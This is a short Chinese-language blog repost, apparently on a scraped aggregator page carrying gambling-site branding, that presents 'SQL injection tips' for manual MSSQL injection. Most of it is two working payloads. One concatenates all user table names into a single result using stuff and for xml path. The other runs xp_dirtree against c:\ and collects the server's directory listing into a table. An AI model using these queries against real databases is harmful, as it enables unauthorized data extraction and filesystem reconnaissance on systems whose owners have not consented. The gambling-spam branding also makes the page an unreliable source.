欢迎访问 生活随笔!

ag凯发k8国际

当前位置: ag凯发k8国际 > 运维知识 > 数据库 >内容正文

数据库

sql注入小技巧 -ag凯发k8国际

发布时间:2024/10/8 数据库 0 豆豆
ag凯发k8国际 收集整理的这篇文章主要介绍了 sql注入小技巧 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

平时手工mssql注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句,有兴趣的朋友可以试试,类似mysql的group_concat !效果还是不错的!


测试1:
select top 1 name=stuff((select ',' [name] from sysobjects t  where xtype='u' for xml path('')), 1, 1, '') from sysobjects t1

测试2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

select top 1 paths=stuff((select ',' [paths] from dirs for xml path('')), 1, 1, '') from dirs t1

转载于:https://www.cnblogs.com/amwld/archive/2011/04/19/2020417.html

与50位技术专家面对面20年技术见证,附赠技术全景图

总结

以上是ag凯发k8国际为你收集整理的sql注入小技巧的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得ag凯发k8国际网站内容还不错,欢迎将ag凯发k8国际推荐给好友。

网站地图